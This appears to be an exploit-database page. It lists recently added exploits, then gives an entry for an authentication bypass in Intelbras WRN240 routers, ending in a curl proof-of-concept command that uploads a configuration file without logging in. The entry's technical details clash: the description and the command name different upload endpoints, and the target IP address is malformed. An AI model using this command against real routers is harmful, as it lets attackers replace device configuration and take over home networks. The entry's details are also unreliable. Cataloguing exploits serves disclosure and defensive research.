
12 changes to exploits/shellcodes Cyberoam Authentication Client 2.1.2.7 - Buffer Overflow (SEH) Wing FTP Server 6.2.3 - Privilege Escalation Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow Joplin Desktop 1.0.184 - Cross-Site Scripting Netis WF2419 2.2.36123 - Remote Code Execution Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User) TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware) Wing FTP Server 6.2.5 - Privilege Escalation TP LINK TL-WR849N - Remote Code Execution Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload) Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)
21 lines
No EOL
794 B
Text
21 lines
No EOL
794 B
Text
# Exploit Title: Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)
|
|
# Date: 2019-11-20
|
|
# Exploit Author: Elber Tavares
|
|
# Vendor Homepage: https://www.intelbras.com/
|
|
# Software Link: http://en.intelbras.com.br/node/1033
|
|
# Version: Intelbras Wireless N 150Mbps - WRN240
|
|
# Tested on: linux, windows
|
|
# CVE: CVE-2019-19142
|
|
|
|
Intelbras WRN240 devices do not require authentication to replace the
|
|
firmware via a POST request to the incoming/Firmware.cfg URI.
|
|
|
|
REFS:
|
|
https://fireshellsecurity.team/hack-n-routers/
|
|
https://github.com/ElberTavares/routers-exploit/
|
|
|
|
|
|
Poc:
|
|
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
|
|
http://192.168.0.1/userRpm/BakNRestoreRpm.htm" -F data=@config.bin
|
|
http://192.1680.1/incoming/RouterBakCfgUpload.cfg |